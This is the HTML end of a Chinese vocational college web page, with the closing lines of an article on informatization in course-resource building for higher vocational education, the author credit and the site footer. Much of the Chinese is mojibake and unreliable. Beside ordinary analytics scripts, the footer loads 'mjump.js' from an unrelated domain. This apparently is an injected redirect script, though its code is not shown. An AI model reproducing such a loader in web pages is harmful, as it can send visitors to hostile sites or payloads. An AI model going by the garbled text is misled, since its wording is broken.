0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">ä»?/font>“信息åŒ?rdquo;为课程资源建设的主要手段。在信息技术学习环境下,课程已不仅仅局限于传统的学校课堂,应是信息技术与课程的整合ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">高职教育</font>“内外兼修”在实践中摸爬滚打,积累符合自身实际的办学经验,培养了更多符合社会需求的高级技术技能型人才ã€?   </span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt">    <font face="宋体">(作者:陈小åˆ?/font> <font face="宋体">陕西国防工业职业技术学院)</font></span><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p></o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: 宋体; font-size: 12pt; mso-spacerun: 'yes'; mso-ascii-font-family: Calibri; mso-hansi-font-family: Calibri; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt"><o:p> </o:p></span></p> <p align="justify" class="MsoNormal" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; margin: 0pt; text-autospace: ideograph-numeric; mso-char-indent-count: 0.0000; mso-pagination: none; mso-para-margin-right: 0.0000gd; mso-para-margin-left: 0.0000gd"><span style="font-family: Calibri; font-size: 12pt; mso-spacerun: 'yes'; mso-bidi-font-family: 'Times New Roman'; mso-font-kerning: 1.0000pt; mso-fareast-font-family: 宋体"><o:p> </o:p></span></p> <p><!--EndFragment--></p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编ï¼?52370 电话ï¼?371-69213333 <br> 豫ICPå¤?2014925å? </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?4c906ea99aca00434942274d380f8cef"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script type="text/javascript" src="https://js.users.51.la/19986687.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>